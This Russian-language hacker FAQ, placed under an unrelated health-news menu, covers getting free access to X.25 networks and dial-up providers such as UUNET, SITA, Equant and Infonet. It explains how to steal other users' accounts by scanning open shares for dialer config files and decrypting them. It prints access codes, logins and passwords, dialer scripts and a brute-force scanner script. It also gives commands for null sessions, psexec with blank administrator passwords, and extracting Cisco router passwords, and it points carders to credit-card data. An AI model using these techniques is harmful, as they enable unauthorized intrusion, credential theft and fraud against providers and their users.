|
|||||||||||||
|
|||||||||||||
|
Новости
20 бoлeзнeй oт кoта
Опасность вейпинга
Вpeднa ли coя жeнщинaм
Вcя пpавда o яйцаx
Вpaчи нaпoмнили o pискe зapaзиться гeпaтитoм в сaлoнaх кpaсoты
В кaкoе время сyтoк лyчше не лечиться
Tиxий чаc дважды в нeдeлю cнижаeт pиcк инфаpкта и инcульта в два pаза
Слaдкaя гaзиpoвкa вoздействyет нa opгaнизм
Почeмy витaминныe добaвки нe пpиноcят пользы
|
последняя же:
0 - ROSPAC
1 - SPRINT
2 - IASNET
3 - MMTLnet
4 - INFOTEL
6 - ROSNET
7 - ISTOK-K
8 - TRANSINFORM
YYYY YYYY YY - внутрисетевой адрес а еще для тех, кто не знает: сканирование x.25 сети - это последовательный перебор адресов, то есть nua. Его можно осуществить программами типа sprinter или ultra hack, ссылки кидать не буду - ищите ultra.zip или sprinter.zip note1. dnic ситы вроде бы 1116, во всяком случае таким его показывает умная железка фирмы cisco note2. подозреваю я что uunet есть тоже x.25 сеть с dnic 3132
4. А как мне достать NUI?
Общедоступную NUI можно выковорить из всяких там программ доступа к сетям через x.25, например WinCIM, посмотрев на их скрипты или на то, что они передают в порт. Нормальные же NUI можно достать или их покупкой, или как-нибудь спереть их у юзера, например сниффингом сети
5. А что такое сниффинг x.25 сети?
Это перехват ввода другого пользователя. PAD'ы как и другие узлы, имеют свои адреса а значит к ним можно попробовать подключиться. Это возможно не во всех сетях, а там где возможно - поиск таких адресов везде различен. Давным-давно сниффинг в сите описал cyberlirik, а недавно в x25zine#2 graf описывает сниффинг в роснете. советую прочитать.
6a. А иногда программу доступа не дают просто так скачать
В таких случаях можно попробовать скачать программу с расшаренного диска юзера этой сети и у себя доводить ее до функциональности, запустив к примеру filemon и regmon и смотреть куда они обращаются в реестре/чего им не хватает из файлов. Я так доводил до функциональности несколько диалеров, заодно узнал в какой ветви реестра они хронят настройки...
7. Есть ли гейт inet->[любая x.25 сеть]?
В любую x.25 сеть из инета можно попасть через диалаут, которые иногда встречаются на просторах сети
без диалаута можно попасть например сюда:
telnet 194.186.138.131 (rol)
telnet uu.x25.net.ru (uunet)
telnet x25pad.autonet.net (autonet)
telnet lon.telnet.ja.net (janet)
telnet 192.156.137.139 2600 (вроде SITA)
telnet 194.67.8.161 8099 (SOVAMNET)
примечание. с момента прошлого выпуска прошло много времени а информацию эту я снова не проверял. Может быть эти гейты уже не пашут.
Часть 2. Некоторые x.25 сети поконкретнее...
a) UUNET
8. Есть ли в России прямые пулы uunet и их ppp-пулы?
Нету.
Аналогом "ppp-пула" uunet (точнее worldcom'а) можно считать хост wcdial с паролем
sr1p.hpf
или РОЛ со следующим скриптом:
proc main
waitfor "ogin:"
transmit "[email protected]^M"
waitfor "word:"
transmit "[email protected]^M"
endproc
только один хрен, почти все забанено 8a/ а как тогда туда попасть через х.25?
Это все написано на хосте uunet'a mwan. Но там описано не всё, да и зачем много раз составлять одни и те же сценарии если они составлены уже не раз?
Итак:
через ROL, заюзав логин и пароль [email protected]
через ситу nua 2111855
через спринт nua 202202
через tymnet с мневмоникой CML05 (однако у нас это рубанули давно уже)
через ppp infonet с логином [email protected] (информация тут противоречива - с одной стороны сделав на циске sh us можно видеть людей сидящих таким образом а с другой - войти не получается)
через x.25 infonet ( waitfor "CENTER:" transmit "EURO" )
через sovamnet с nua 93106001133
через ppp equant все с тем же [email protected] и еще х. знает через что
И вообще, скрипты доступа почти через все сети мира =) есть в ихней звонилке, скачайте и смотрите.
9. Как достать uic и password?
Аккаунты ко всему достаются путем сканирования на открытые шары, и uunet тут не исключение. Другое дело, что подобные аккаунты хрянятся не где обычно (PWL), а в конфигурационных файлах программы доступа к конкретной сети. Для этого необходимо скачать соответствующую программу доступа, изучить где она хранит данные о пользователе, и тянуть с шар этот файл, потом у себя скормить спертый файл программе доступа если кто-нибудь еще не подсуетился и не написал расшифровщик, и выбить из неё необходимые данные (с помощью например все того же openpass'a)
Программа доступа для uunet называется phone access lookupИмеется и расшифровщик конфигов, написанный barvinok. Конфиг ее лежит в \progra~1\pal\pal.ini (или \progra~1\pal95\pal95.ini или... возможны варианты) после расшифровки получаем:
Info #0 : HostName=hpco
Info #1 : UserID=m00108415
Info #2 : Password=28Faz6m7
тогда как следующее - для ppp:
Info #0 : [email protected]
Info #1 : host_pw=28Faz6m7
Многие вот жалуются, что мол нету нигде этих pal.ini.
Hint: на всем известных диапазонах (212.211. и т.д.) на win95-машинах эти файлы мне почему-то попадались крайне редко. Основную массу я тягал с nt, так что думайте, как сканить... как примерно можно это сделать будет описано ниже, в разделе "разное" =) ссылочки: расшифровщик openpass
Многие могут сказать - да что мол, зачем сейчас эти уики все равно везде забанено всё. скажем так - во первых через жопу (второе ppp скажем) можно юзать и сейчас, во вторых они почему-то изредка разбаниваются ;) а в третьих ну вот говорят что agilent на РОЛе идет и по сей день...
10. Как мне использовать закрытые для России аккаунты worldcom?
Cуществует много вариаций, например:
1)exec shell циски на каком-нибудь из хостов к которым доступ разрешен.
Попав туда набираем: pad 2111855, или pad 3132 (или pad 31329 - точно не помню).
А может, циска уже имеет доступ в инет и можно подсоединиться к telnet гейту набрав скажем telnet uu.x25.net.ru. В некоторых случаях вам может понадобится установить второе ppp соединение, о чем уже до фига писалось.
2)попробовать через грик (некоторые домены имеют роуминг по умолчанию.
например таким был @hp.com (hostname hpco), но из-за наплыва халявщиков недавно был закрыт. Однако таких доменов еще немеряно)
updated. доюзались через грик - закрыли почти всё нахрен. уунет через рол теперь почти не юзается.
3)выходя в уунет через какие-нибудь левые сети (но тут как я писал раньше нужен NUI)
11. А как лучше сканить UUNET?
Сканировать с терминала - это вчерашний день. Добудьте где-нибудь шелл и сканируйте с него через ip гейт. Кроме того, необходимо достать программу-сканер. Perl и всякие там expect'ы - довольно тормозная вещь, поэтому опитмальный вариант - это реализация многопоточности на си (например uunetscan.narod.ru) или то же самое через nonblocking sockets (хрен знает есть ли такое)
12. Дайте мне диапазоны где сидят диалапщики hp.com, kpmg.com и т.д
Нет у них своих диапазонов, потому что это - не провайдеры, а компании занимающиеся более другими делами, а в инете их работники или кто они там, эти люди с аккаунтами, сидят через worldcom, так что и искать их надо там.
13. А я слышал, что можно коннектиться к compuserve через Петерлинк
У них на сайте лежат скрипты для WinCIM'а но я их не изучал и не собираюсь потому что думаю что ничего хорошего из этого не выйдет.
14. Как менять пароли на аккаунты worldcom'а?
Честно говоря, я уже не помню. У меня где-то было это записано . Если мне не изменяет память это было и еще что-то для другого типа акков. В любом случае куда копать я вам сказал. Кстати если пошустрить в диапазоне веб-серваков wcom.net сканером можно найти много интересного, например
vpnclients.wcom.net с софтом для доступа в VPN соответствующих компаний со всеми вытека-ющими последствиями. Вот кстати и второе правило исследования разных сетей - пробовать найти и заюзать все пользовательские сервисы, логиниться куда угодно, прошерстить все http а особенно https сервера...
б) Сита.
Кратенько - как начать работать с падом:
после дозвона необходимо задать тип терминала - передать .^M где ^M = enter. Вылезет
SITA network : xxxx xxx где xxxx xxx - адрес линии на которую дозвонились.
После этого надо задать NUI (без него не дадую никуда вылезти): nui xxxxxxxx
и после запроса ввести пароль. после этого вводим NUA и вперед.
15. Какие есть общедоступные Nui для ситы?
19730001/KHS9NE
16. Вот сижу я на сите и вдруг пакеты перестают ходить, а связь не рвется.
Происходит это оттого, что сеть слишком загружена. Несколько лет назад этого не было никогда, но и любителей халявы тогда было уж куда поменьше. По-моему единого решения этой проблемы не существует, но вот суждения высказанные разными людьми в разное время:
a) это зависит от используемого nui и nua (вполне возможно, ищите те которые никто не использует) а также от логина (а это уже бред)
б) от скорости соединения - чем ниже тем стабильнее. (не уверен, это помогает когда плохая линия связи а тут вряд ли поможет)
в) надо изменить размер входных и выходных пакетов. (вот это наиболее полезная по моему штука, для этого надо перед nua ставить конструкцию задающую их размер:
Line(xxx/xxx) yournua, например
Line(64/64) 9002167001
г) изменить параметры пада (даже кто-то приводил необходимые значения:
set 1:0,2:0,3:0,4:1,9:0,13:4,21:0 но это особо не помогает)
д) запустить Сеанс MS-DOS и там набрать:
ping -t uunet.x25.net.ru (этот хост для примера, можно использовать любой
другой). Смысл в том, чтобы пакеты шли постоянно. Тем самым вы резервируйте для себя чуть-чуть канала. Конечно, что-либо качать это мешает, но сидеть в IRC/ICQ - самое то.
Вобщем попробуйте эти способы и может вам это поможет.
17. Как по ситовскому nua определить местоположение?
формат адреса:
2 XX X YYY
XXX - код страны, например 270 - Россия.
18. Что можно использовать через ситу?
В сите есть адреса почти всех известных провайдеров которые все очень любят =)
Ну про адрес uunetа уже писали, ipass и equant - смотри ниже, грик-тоже ниже =)
в) Спринт.
как начать работать с падом: звоним на пул, далее необходимо задать количество битов/четность. Для 8N1 вводим @D^M получим запрос terminal= на который введем d1^M и ждем приглашение @D. Cюда вводим команды, или NUA. В данной сети как и во многих других к некоторым адресам можно подключаться без NUI, а при соединении с NUI формат команды будет nua,nui,nua_password
19. Что можно заюзать?
в спринте есть Nua через которые можно было использовать некоторые аккаунты equantа
(например [email protected] =)) и соответственно ipass через эквант (это сейчас
уже вряд ли). NUA:
031109671905100
76632343
031105721029100
031109601178000
031109671905100
кроме того конечно там есть nua gin'a, см. раздел про gin.
г) Роснет.
сразу после дозвона вылезет Welcome to ROSNET! и приглашение * -туда и вводим свой NUA. Через Роснет доступны только русские ресурсы поэтому там можно заюзать только ихние собственные логины (см. www.rosnet.ru) и MTU (см. ниже)
д) Cовамнет.
Что-то нонче интерес к совамнету поутих, раньше каждый день кто-то спрашивал про nui =)
Совамнет - это сеть компании СовамТелепорт, использующая технологию x.25
Используется например для связи между всякими там банками Построено все это чудо на оборудовании Nortel Magellan Доступ к ней можно осуществить через пул РОЛ, позвонив туда или прителнетившись,
и использовав логин и пароль x25:
sovam!login: x25
Password:
Trying 194.67.8.161, 8099 ... Open
SOVAMNET: 30130123
Далее вводим NUI (так просто вам его не даст, так что ищите сами). Формат команды как в сите (nui xxxxxxxx).
SOVAMNET: network user identifier xxxxxxxx active
Далее, вводим nua.
е) Тимнет.
честно говоря, не знаю что про эту сеть и сказать-то =) я через нее только уунетовские хосты использовал давным-давно. Скажу только что звонить надо с настройками 7e1 и в log in: писать мневмонику
Часть 3. Провайдеры, буржуйские и наши.
a) грик консорцыум
20. Какие домены грика до сих пор работают? как мне включить роуминг на [domain]?
Работающих (не закрытых для России) доменов осталось очень мало, поэтому ясное дело никто не хочет их светить. попробуйте поискать сами список всех провайдеров входящих в консорциум Точно также и с включением роуминга - просто там никто не скажет, ищите на сайте провадера сами. Сейчас с включением роуминга на Россию стало вообще тяжело - по умолчанию его уже не делает вроде никто, и сделать его можно через жопу - куда-нибудь позвонив, прислав им скан документа и т.д. Так что наверное можете уже и не искать. =) Грик как он был раньше уже не
работоспособен для нас можно сказать, через него можно использовать сейчас некие остатки уунета, фиберлинк и т.д.
21. Можно ли использовать аккаунты грика через x.25 сети?
Скрипт, лежавший одновременно и в гриковом, и в фиберлинковском диалере:
proc main
transmit "...^M"
waitfor "SITA NETWORK"
transmit "NUI xxxxxxxxx^M"
waitfor "password"
transmit "xxxxxx^M"
waitfor "active"
transmit "2124172001^M"
waitfor "connected"
endproc
б) equant
Забанено так же очнь много. До сих пор работают аккаунты нескольких компаний, а халявщики же основной упор делают на использование *.00.go - по моему разумению что-то вроде аналога корпоративных аккаунтов в ворлдкоме.
22. Как использовать аккаунты equant забаненые на прямых пулах?
Выбирайте nui из вышеприведенного списка ситовских, а нуа вот отсюда:
9002156001 2311021001 - ams
9002157001 2337528001 - par
9002158001 2498247001 - fra
9002159001 2126209001 - lax
9002160001 2151271001 - sea
9002161001 2112184001 - jre
9002167001 2811222001 - qxo
9002168001 2853167001 - hkg
9002169001 2616373001 - bwu
9002261001 2448678001 - lon
9003156001 2151271001 - ams
9003157001 2337528001 - par
9003158001 2498247001 - fra
9003159001 2126209001 - lax
9003160001 2151271001 - sea
9003161001 2112184001 - jre
9003167001 2811222001 - qxo
9003168001 2853167001 - hkg
9003169001 2616372001 - bwu
9003261001 2448672001 - lon
на сегодняшний день точно работают с этими nua nui 79900001 и 22421028
в) at&t, ibmnet
по этим вещам у меня информации не очень много, и уверенности в том что она правильная нету, но напишем что знаем.
23. Как использовать аккаунты AT&T?
23a) worldnet
обычные аккаунты типа [email protected] сейчас уже вроде как использовать не получится.
Раньше работало следующее:
Через пул:
proc main
transmit "*CLR
" waitfor "Please Sign-on:"
transmit "[email protected]^M"
waitfor "Password:"
transmit "569365964^M" - может быть любым.
waitfor "Please Sign-on:"
transmit "ваш аккаунт AT&T,ваш пароль AT&T"
waitfor "}"
endproc
Через INFONET:
proc main
waitfor "ogin:
" transmit "wvpn03*xwnet04^M"
waitfor "assword:"
transmit "wvpn03oz^M"
waitfor "connected"
transmit "^M"
endproc
скрипт через пул at&t очень похож на те которые сейчас используются на аккаунтах типа [email protected], про которые вы можете прочитать в статье vaio, взятой с deer.net.ru здесь ATT а логин/пасс для доступа к ppp через инфонет вроде тоже работает(или работал?) после бана
[email protected] так что пусть эта инфа останется, решил я. Про акки [email protected] я уже говорил где читать надо =)
23б) global network
аккаунты типа dualaccess.*.* , secureip.*.* да и вообще все кроме internet.*.* по умолчанию работают на наших пулах. а на аккаунтах internet.*.* по умолчанию нету роуминга только на 3 страны - Филиппины, Пакистан и конечно же Россия. По информации на сайте чтобы врубить роуминг надо позвонить в службу поддержки для
России, дается телефон в Голландии. Кто хочет звоните =) Кроме того, аккаунты с включенным роумингом можно найти на диапазонах где сидят российские юзеры =) p.s. когда копался в свойствах аккаунта на services.prserv.net там было manage your credit card, user information и т.д. я там особо не лазил, но возможно
там есть информация о кредитке владельца аккаунта - кардерам на заметку =)
г) GIN
на своем веб-сайте называют себя "русский эквант". И действительно что-то общее заметить легко ;) Имеют ppp-пулы а также доступны через Спринт со следующим скриптом лежащем на их сайте:
proc main
string szPassword
transmit "@D^M"
waitfor "TERMINAL=",matchcase until 7
transmit "^M"
waitfor "@",matchcase until 1
transmit "025017720101800^M"
endproc
Через gin работают аккаунты экванта типа *.00.* ,более того мне нередко встречались 00.ru которые являются русскими корпоративными аккаунтами. Обычные же юзеры имеют аккаунты типа @gin.ru @gin.by и типа того...
p.s. интересно если аккаунты екванта работают через джин то верно ли обратное? =) не пробовал никогда
д)ipass
честно говоря, рабочего аккаунта ipass который можно бы было использовать в России я уже не видел давно, но я в общем-то и не искал =) Раньше работало следующее:
-через equant,gric и еще х знает через что добавляя перед логином "IPASS/". например:
IPASS/000066638963044478010#[email protected]
-через ситу: nui 37830001 nua 9001252001 - это "родная" информация, тут возможны варианты.
а вот какие скрипты лежат в официальном хелпе ipass'а только я думаю у нас таких сетей не водится: IPASS
у них есть свой диалер, которым юзеры на роуминге любят пользоваться, называется
ipassconect, аккаунт лежит в \progra~1\ipass\ipassco~1\userpref.ini, для извлекания пароля - тянем ipassconnect и юзаем openpass
е) инфонет
Имеется ppp-пул доступный для всей России 8w8002001234 (про toll free смотри ниже)
Инет довольно хороший и бодренький, однако тут тоже сказалась эпидемия отхватывания банов - на многие хорошие домены все чаще видишь NAS group unlisted =(
Аккаунты есть двух типов: user*обозначение_домена и user@domain Разницы между ними по моему особой нету, как написано в хелпе к диалеру первое - просто более старая форма записи, а вторая - более новая.
У них свой диалер dialxpressway, с которым лично я до конца не разобрался.
Аккауни лежит \progra~\infone~\dialxpressway <версия диалера>\data\accounts.username.ini или accesscodes.username.ini
Однако после скачивания файла возможны варианты:
P=8C001002010200000168000000A4000084C19015DC76D48CCA1F02BC25479F6D009A928149E2D3B48
7D11B12AE37A15A920C140AD2C459144FD4D7502C26D385A868CF3DA2B6452AD9D3401F01F4F4E00FD7
2FE0EF9F8D79747CE75A93161A0B687DE720D7EF4D598B98950C400F794634A7A94C1E5BDAB345E3DF6
BC1B4444555BF47F4E52A5E51D9885A289AED020007000000557F5072AAFB81
F=000000
R=rb
Пароль как я думаю вы уже догадались зашифрован в строчке P= так вот. Если первый байт =8 то при подкладывании конфига в свой диалер пароль появится в виде звездочек в нужном поле и остается только запустить openpass а если 4= то х...й - пароль не появится. На взгляд шифрованный пароль в таком виде короче:
[rstevens*cayto0m]
P=4C002002010200000168000000A40000539A4F5DD4008837248452194DCDD948DF73247E0B07CE46B
88434CC95AFFAE9F63B48607541E8E79A8D4AC3C234D8FAAB55EF960F25703C3FE3AA33FB1C02000800
000044837C6939F45E9B
F=000000
R=Standard
и я сделал вывод что ключ к расшифровке в этом случае хранится в реестре, и не находя его система не может расшифровать конфиг. поэтому надо еще и с реестром заморачиваться.
ё)МТУ
Московский провайдер МТУ-интел. Почему он столь любим нашими халявщиками - я не знаю но его любят поюзать все.
24. Можно ли использовать аккаунты МТУ не в Москве?
В Роснете есть (был?) ppp вход в МТУ Посмотрите nua 600814055 600290504 или поищите по старым публикациям про роснет. updated: появился и пул в Питере - 3801108
А еще есть один Роснетовский nua который правда работает вроде только для подмосковья 61106500004
Часть 4. Разное
25. А правда, что телефоны 8-800 бесплатные?
Правда. В этом можно убедиться даже смотря телевизор ("горячая линия против простуды" и прочая херь). Типа, шагаем в ногу с америкой (там 1-800 тоже free) Правда тут есть минус - если твой номер невозможно определить АТС тебя не пустит на междугороднюю линию и поэтому твой номер при таких звонках всегда определён. Поэтому счет не придет но могут придти серые люди.
26. Как установить второе ppp соединение под *nix?
нужно воспользоваться программой которая может перенаправлять свой ввод и вывод на виртуальный терминал (pty) и настроить pppd на работу с этим самым pty. Пример таких программ - modemu (читаем ее документацию), pty-redir (читаем VPN-howto или mini-howto, не помню уже. там все показано
на примере, правда не pppd а ssh)
27. Есть у меня диалер для сети xxx. Как посмотреть какими командами он обменивается с пулом/выдрать скрипт/etc
Тут вариантов много. Например чтобы друг с терминалкой эмулировал пул и позвонить ему =) однако можно это все сделить просто и на одной машине используя драйвер виртуального модема, например COM/IP. Итак:
1) Ставим COM/IP с драйвером виртуального ком-порта и модема. Итак можно вместо звонков конектиться по ТСР
2). Запускаем что-нибудь на проспушивание какого-либо порта (в COM/IP по умолчанию
23), так, чтобы можно было руками вводить как бы "ответы" padа - например вполне сойдет nc
3)в звонилке ставим юзать com/ip virtual modem звоним на номер 127000000001 то есть подрубаемся к nc и осуществляем обмен данными =)
28. Как узнать ip-диапазоны dialup'а буржуйского провайдера [kewlprovider]?
Я делал очень просто - заходил на irc в очень многопосещаемый канал (типа #usa, или #japan когда речь шла о каком нибудь ocn.ne.jp =)) и просто там висел. Потом просматривая логи joins/parts, можно было видеть что нибудь типа:
* ivangovnov ([email protected]) has joined #usa то что нам и надо.
Правда оказывается даже после этого люди не могут найти эту галку =)
А я уже и вспомнить не могу, где ее когда-то ставил. По моему это в категории IRC не выбирая подкатегорию ставим show addresses и убираем short joins/parts
И еще. Люди спрашивают "как же мол whois". Так вот, с whoisа вы получите либо огромный диапазон который зае...тесь просканивать или там вообще не окажется ни одного диалапщика а только вебсервера какие-нибудь
29. Как узнать адреса DNS серверов для провайдера [kewlprovider]?
Как правило если при установлении ppp соединения удаленная сторона не сообщает вас адреса dns, то в принципе в свойстве соединения можно прописать адреса любых dns серверов. Если все-таки нужны адреса обслуживающие конкретный домен, то:
запускаем nslookup
говорим ей set type=ns
и после этого вводим домен для которого надо узнать адреса, например rosnet.ru
30. Вот сканерю я, а какие файлы обычно люди с шар тянут?
аськины uinы:
\progra~1\icq\2000a\??????.uin
\progra~1\icq\2000b\??????.uin и так далее
конфиги диалеров, например \windows\edialer.ini
\progra~1\ipass\ipassco~1\userpref.ini - ipass
\progra~1\ipass\ipassco~1\ipass.ini - ipass
\progra~1\at&t\wns\user\account.* - at&t dialer, как его там
конфиги ftp клиентов, типа \progra~1\ws_ftp\ws_ftp.ini - там часто можно
обнаружить аккаунт на шелл
ну и про *.pwl и system.ini и так все знают
31. как найти dialout?
Вкратце - открытые модемы в основном висят на портах 2001-2012. сканим и ищем =) а еще бывает на 4001-4012 или 6001-6012,
32. Какие есть пароли по умолчанию на всякие там роутеры?
вот некоторые из них (собранные вроде cyberliric'ом):
passw
а вообще надо просто почитать официальную документацию на интересующую железку, из нее и пароли узнаете и еще много интересного =)
33. А как находить расшаренные диски? у меня сканер ничего не находит
Это наверное вопрос номер 1 на всех форумах =) хоть он тут и не очень в тему ответим.
Чтобы правильно работал сканер надобно:
чтобы в свойствах соединения с инетом стояла галка "вход в сеть" и были установлены следующие компоненты:
протокол tcp/ip и "контроллер удаленного доступа" (естественно)
клиент для сетей microsoft
и (вроде бы) протокол NetBEUI хотя по-моему он как раз таки и не нужен
34. А некоторые диалеры типа GRICdial хранят всю информацию в реестре. Что делать?
Подмонтировать диск и заюзать Registry Viewer - тогда можно будет обойтись без скачиавния всего реестра. Хотя я все-таки рекомендую посмотреть на размер реестра - если он не очень-то большой то лучше наверное все-таки его скачать
35. Теперь ветка win9x закрыта, выпускают только клоны NT. Как же сканировать?
Все распространенные сканеры не могут работать с WinNT машинами потому что там немного другая система доступа к расшаренному диску - допускать вас или нет определяется паролем на диск, а аккаунтом. Таким образом надо получить аккаунт на данной машине и потом уже пытаться получить доступ к диску.
Вкратце расскажу как сделать это руками:
-сначала надо определить имя пользователя. это можно сделать с помощью sid2user и user2sid. не знаю работает ли это на всяких там XP - я пишу про классическую NT4 с которой раньше часто имел дело =)
Не забывайте о стандартных аккаунтах. Юзера administrator не все переименовывают -посмотреть какие шары доступны.
net use \\ip\IPC$ "" /user:"" (или например уже тут использовать известный
аккаунт если он есть: net use \\ip\IPC$ "" /user:administrator) и сделать net view \\ip
минусы - не будут выведены шары у которых в имени на конце $
Не забывайте о стандартных NT шарах C$ D$ ADMIN$ =) -ну и собственно подключить диск (net use q: \\ip\C$ "password" /user:"login") и скачивать информацию.
примечание. sam и реестр так скачать не получится. придется ограничиться конфигами диалеров. Как теоретически выбить информацию из sam смотри в след. вопросе
36. Как поставить пандору на шелл?
Есть пандора под Linux. однако все почему-то предпочитают ставить её на NT. Следовательно надо получить привелегию исполнять команды на сервере. Кому-то тут может помочь старый добрый тупой уникодовский баг но я пользовался следующим - я уже писал что многие не отключают юзера administrator и пароль у
этого юзера пустой. Если зайти на www.sysinternals.com то можно найти такую штуку как psexec которая установится на том компе как сервис и позволит выполнить там любую команду. Поэтому пускаем
psexec \\ip -u administrator -p "" cmd и радуемся.
37. Нашел классного провайдера xxx аккаунты которого можно использовать через сервис yyy и где включать роуминг но его не дают включить =(
Нередко такие вещи как управление аккаунтом дают делать только со своих диапазонов. Поэтому надо найти телефон пула провайдера xxx, установить второе ppp соединение через dialout и врубить себе роуминг.
38. Как взломать cisco и взять у нее пароли от интернета?
Невозможно вот так взять и научить взломать cisco особенно если админ не дурак. Попробуйте найти аккаунт к ней, можно тупо попробовать cisco/cisco, если циска прова - заюзать его аккаунт, а авось бросят не в РРР сразу а в exec shell =) Далее надо получить необходимые привелегии чтобы посмотреть конфигурацию системы то есть войти в enable - 15ый уровень привелегий. Делают
это командой enable которая скорее всего вас обломает запросом password: =) Но если получится и приглашение роутера сменилось с router> на router# то пишем там sh runn и получаем текущую конфигурацию роутера. Пароли там могут лежать в нескольких видах:
username user password 0 k3wlpasS незашифрованном =)
username user password 7 105A1A1C070507 зашифрованным но обратимо.
Чтобы расшифровать это дело надо john'ом the ripper'ом
Но скорее всего пароли для доступа в интернет хранятся на радиус-сервере и аутентификация производится через радиус, тогда вы увидите:
ip radius source-interface Loopback0
tacacs-server host XXX.XXX.XXX.XXX
tacacs-server host XXX.XXX.XXX.XXX
tacacs-server timeout 40
tacacs-server directed-request no-truncate
tacacs-server key some fucking key
radius-server host XXX.XXX.XXX.XXX auth-port 1645 acct-port 1646 non-standard key #
some#fucking#key
и тогда вам уже придется имеь дело с радиусом. Еще естественно надо порыться в архивах всяких bugtraq'ов перед тем как =)
p.s. если в приграшении роутера набрать ? то он выведет все свои команды если набрать ? после команды он выдаст её параметры
ПРИЛОЖЭНИЭ. Очень часто люди спрашивают - какие диапазоны ip мол мне сканить?
и раньше мы пытались ответить на это и даже приклыдавали файл в котором содержались ip которые были на 80% откровенно херовыми и ненужными. Так что насчет ip диапазонов - ищите сами, спрашивайте друг у друга и т.д. Так что - бзз приложэний.
Q.Что такое SOVAMNET, дайте мне NUI и как оттуда выйти в УУНЕТ!!!
A.Совамнет - это сеть компании СовамТелепорт, использующая технологию x.25
Используется например для связи между всякими там банками =) Построено все
это чудо на оборудовании Nortel Magellan
Доступ к ней можно осуществить через пул РОЛ, позвонив туда или прителнетившись,
и использовав логин и пароль x25:
sovam!login: x25
Password:
Trying 194.67.8.161, 8099 ... Open
SOVAMNET: 30130123
Далее вводим NUI (так просто вам его не даст, так что ищите сами). Формат
команды как в сите (nui xxxxxxxx).
SOVAMNET: network user identifier xxxxxxxx active
Далее, по просьбам трудящихся попробуем выйти в uunet:
31102020020200
SOVAMNET: call cleared - temporary network problem
SOVAMNET: 30130123
Сканить эту сеть я не пробовал так что есть ли там что интересное - хуй знает.updated: как оказалось, в uunet можно выйти по nua 93106001133, в отличие от общеизвестных записанных с dnic'ом. причём там вроде как работает много из тех хостов, которые not allowed from this gateway в других местах.
Q. Через что возможен доступ в uunet?
A.Это можно узнать на все том же хосте уунета mwan.
Но там описано не всё, и зачем много раз составлять одни и те же сценарии если они составлены уже не раз?
Итак:
через ROL:
proc main
waitfor "ogin:"
transmit "[email protected]^M"
waitfor "word:"
transmit "[email protected]^M"
waitfor "pen"
transmit "^M"
waitfor "ame:"
transmit $USERID, raw
transmit "^M"
waitfor "word:"
transmit $PASSWORD, raw
transmit "^M"
waitfor "~"
endproc
через sita network:
proc main
transmit "...^M"
waitfor "SITA"
transmit "nui 19730001^M"
waitfor "XXX"
transmit "khs9ne^M"
waitfor "active"
transmit "2111855^M"
waitfor "ame:"
transmit $USERID, raw
transmit "^M"
waitfor "word:"
transmit $PASSWORD, raw
transmit "^M"
waitfor "~"
endproc
через tymnet:
proc main
set port databits 7
set port parity even
transmit "^M"
waitfor "terminal"
transmit "A"
waitfor "log in"
transmit "CML05^M"
waitfor "ame:"
transmit $USERID, raw
transmit "^M"
waitfor "word:"
transmit $PASSWORD, raw
transmit "^M"
waitfor "}"
set port databits 8
set port parity none
endproc
Вставив это в свойства соединения, указываем логин и пароль в виде:
login: host_name,uic (например cnnint,kotp)
password : пароль (тут всё понятно)
для информации: в принципе пароль можно указывать и в виде
host_name,login\password . кроме того существуют и другие параметры вроде установки типа терминала
Кроме того, в уунет можно попатсть через спринт (nua 202202), раньше можно было через инфонет с логином и паролем [email protected] (как сейчас - не знаю) и еще хрен знает через что
updated: например через инфонет - вот кусочек сценария:
set port databits 7
set port parity even
transmit "^M"
transmit "^M"
transmit "^M"
waitfor "#"
transmit "C"
transmit "^M"
waitfor "CENTER:"
transmit "EURO"
transmit "^M"
waitfor "Host Name:
Однако следует различать пулы инфонета - есть x.25, а есть ppp. Это скрипт для
x.25 пула, а тот общеизвестный 8w800200.... - ppp, то есть там это не прокатит.
Q.А правда, что телефоны 8-800 бесплатные?
A.Правда. В этом можно убедиться даже смотря телевизор ("горячая линия против простуды" и пр.). Типа, шагаем в ногу с америкой (там 1-800 тоже free)
Q. А как лучше сканить UUNET?
A.Сканировать с терминала - это вчерашний день. Добудьте где-нибудь шелл и сканируйте с него через ip гейт. Кроме того, необходимо достать программу-сканер. Perl и всякие там expect'ы - довольно тормозная вещь, поэтому опитмальный вариант - это реализация многопоточности на си или то же самое через nonblocking sockets (хрен знает есть ли такое) - сканер uunet на си updated: а вот как сканили раньше... Скрипт morgoth'а, вечная ему память.
------- begin
; for scan CompuserveNetwork's hostnames
; v1.4 [email protected]
OPENREAD hosts.txt
SEARCH
start:
TRANSMIT "@D^M"
WAITFOR "TERMINAL=" , 20
TRANSMIT "d1^M"
WAITFOR "@" , 20
con:
TRANSMIT "202202E^M"
WAITFOR "Name:" , 20
con0:
TRANSMIT "%LOGIN%/new^M"
WAIT "Name:|UIC:|@|}|onnected to|assword:|error|not allowed" ,40
CHECK "Name:" , con1
CHECK "UIC:" , con2
CHECK "@" , con1
CHECK "}" , found
CHECK "onnected to" ,con6
CHECK "assword:" ,con5
CHECK "error" ,con6
CHECK "not allowed" ,con6
con1:
READRECORD
goto con0
con2:
TRANSMIT "%LOGIN%^M"
WAIT "assword:|UIC:|@|}|onnected to|error|not allowed" , 40
CHECK "assword:" , con3
CHECK "UIC:" , con4
CHECK "@" , tryagain
CHECK "}" , found
CHECK "onnected to" ,con6
CHECK "error" ,con6
CHECK "not allowed" ,con6
con3:
TRANSMIT "%LOGIN%^M"
WAIT "assword:|@|}" , 40
CHECK "assword:" , con3
CHECK "@" , tryagain
CHECK "}" , found
con4:
SAVEFOUND
goto con2
con5:
SAVEFOUND
goto con3
con6:
SAVEFOUND
READRECORD
goto con7a
con7:
TRANSMIT "guest^M"
con7a:
WAIT "Name:|ASSCODE:|assword:|sername:|ogin:|ID|@" ,90
CHECK "Name:" , con0
CHECK "ASSCODE:" , con7
CHECK "assword:" , con7
CHECK "sername:" , con7
CHECK "ogin:" , con7
CHECK "ID" , con7
CHECK "@" , try2
found:
SAVEFOUND ; save login, seems to be valid, in ultra.fnd
WAITFOR "@" , 90
goto tryagain
tryagain:
READRECORD
try2:
goto con
----- end
Q. Как достать uic и password?
A.Аккаунты ко всему достаются путем сканирования на открытые шары, и uunet тут не исключение. Другое дело, что подобные аккаунты хрянятся не где обычно (PWL),а в конфигурационных файлах программы доступа к конкретной сети. Для этого необходимо скачать соответствующую программу доступа, изучить где она хранит данные о пользователе, и тянуть с шар этот файл, потом у себя скормить спертый файл программе доступа если кто-нибудь еще не подсуетился и не написал расшифровщик, и выбить из неё необходимые данные (с помощью например все того же openpass'a)
Программа доступа для uunet называется phone access lookup.Имеется и расшифровщик конфигов, написанный barvinok.
